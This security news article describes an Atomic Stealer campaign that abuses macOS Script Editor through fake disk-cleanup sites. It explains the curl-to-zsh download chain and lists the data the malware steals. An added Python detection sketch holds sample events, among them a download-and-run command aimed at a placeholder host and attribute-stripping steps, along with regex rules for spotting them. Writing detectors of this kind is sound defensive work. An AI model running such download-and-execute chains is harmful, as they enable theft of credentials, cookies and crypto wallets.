# macOS Users Targeted by Atomic Stealer via Script Editor ClickFix Attack
A new campaign is targeting macOS users with the **Atomic Stealer** malware, leveraging the built-in Script Editor application in a sophisticated ClickFix attack. This attack bypasses the need for direct Terminal interaction, making it more insidious than previous variants.

**Script Editor**, a trusted macOS application used for writing and running scripts (primarily AppleScript and JXA), is being abused to deliver malware. Researchers have observed a new ClickFix technique that doesn't require users to manually interact with the Terminal, unlike earlier attacks.
### ClickFix Attack Bypasses Terminal Warnings
**Apple** added protections against ClickFix attacks in macOS Tahoe 26.4, which displays a warning when commands are executed in the Terminal. The new Script Editor-based attack circumvents that security measure because it never goes through the Terminal.
### Fake Apple-Themed Sites Distribute Malware
Security researchers at **Jamf** have observed a campaign where attackers are using fake Apple-themed websites that pose as guides to help users reclaim disk space on their Mac computers. These sites contain seemingly legitimate system cleanup instructions but use the `applescript://` URL scheme to launch Script Editor with pre-filled executable code.

### Technical Breakdown of the Attack
The malicious code executes an obfuscated `curl | zsh` command, which downloads and executes a script directly in system memory. This script decodes a base64 + gzip payload, downloads a binary (`/tmp/helper`), removes security attributes using `xattr -c`, makes it executable, and then runs it.
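A detection sketch for the chain described above, added here as an example and not taken from Jamf's report or the original article: it walks process-execution events and flags any Script Editor process tree that both downloads with `curl` and clears attributes on, or executes, a file under `/tmp`. The event tuple layout, the pids and the `example.invalid` URLs are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample events: (pid, parent pid, executable path, command line).
# The tuple layout is an assumption; map it to your EDR or audit export.
SE = "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"
EVENTS = [
    (100, 1, SE, "Script Editor"),
    (101, 100, "/bin/sh", "sh -c curl -fsSL https://example.invalid/x | zsh"),
    (102, 101, "/usr/bin/curl", "curl -fsSL https://example.invalid/x"),
    (103, 101, "/bin/zsh", "zsh"),
    (104, 103, "/usr/bin/xattr", "xattr -c /tmp/helper"),
    (105, 103, "/bin/chmod", "chmod +x /tmp/helper"),
    (106, 103, "/tmp/helper", "/tmp/helper"),
    (200, 1, "/bin/zsh", "zsh -l"),  # unrelated interactive shell
    (201, 200, "/usr/bin/curl", "curl -O https://example.invalid/file.zip"),
]

TMP = r"/(?:private/)?tmp/"  # /tmp is a symlink to /private/tmp on macOS
RULES = {
    "download": re.compile(r"\bcurl\b"),
    "xattr_clear": re.compile(r"\bxattr\s+-\w*c\w*\s+" + TMP),
    "chmod_exec": re.compile(r"\bchmod\s+\+x\s+" + TMP),
}

def script_editor_root(pid, parents, paths):
    """Return the pid of a Script Editor ancestor of pid, or None."""
    seen = set()
    while pid in parents and pid not in seen:
        seen.add(pid)
        pid = parents[pid]
        if paths.get(pid, "").endswith("/Script Editor"):
            return pid
    return None

def detect(events):
    """Script Editor pid -> stages, kept only if a download pairs with xattr clearing or /tmp exec."""
    parents = {pid: ppid for pid, ppid, _, _ in events}
    paths = {pid: path for pid, _, path, _ in events}
    stages = defaultdict(set)
    for pid, _, path, cmd in events:
        root = script_editor_root(pid, parents, paths)
        if root is None:
            continue
        stages[root].update(n for n, rx in RULES.items() if rx.search(cmd))
        if re.match(TMP, path):
            stages[root].add("tmp_exec")
    return {r: sorted(s) for r, s in stages.items()
            if "download" in s and s & {"xattr_clear", "tmp_exec"}}
```

Calling `detect(EVENTS)` reports the tree rooted at pid 100 with all four stages, while the `curl` run from an ordinary login shell (pids 200 and 201) is ignored.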
### Atomic Stealer (AMOS) Payload
The final payload is a Mach-O binary identified as **Atomic Stealer** (AMOS), a commodity malware-as-a-service. This malware has been extensively deployed in ClickFix campaigns using various lures over the past year. AMOS targets a broad spectrum of sensitive data, including:
* Keychain information
* Desktop files
* Cryptocurrency wallet extensions
* Browser autofill data
* Passwords
* Cookies
* Stored credit cards
* System information

Last year, AMOS also added a backdoor component to provide operators with persistent access to compromised systems.
### Mitigation and Prevention
Mac users should treat Script Editor prompts with extreme caution and avoid running them unless they fully understand the code and trust the source. Rely on official documentation from Apple for macOS troubleshooting guides. While **Apple Support Communities** can be helpful, exercise caution as advice may not be risk-free.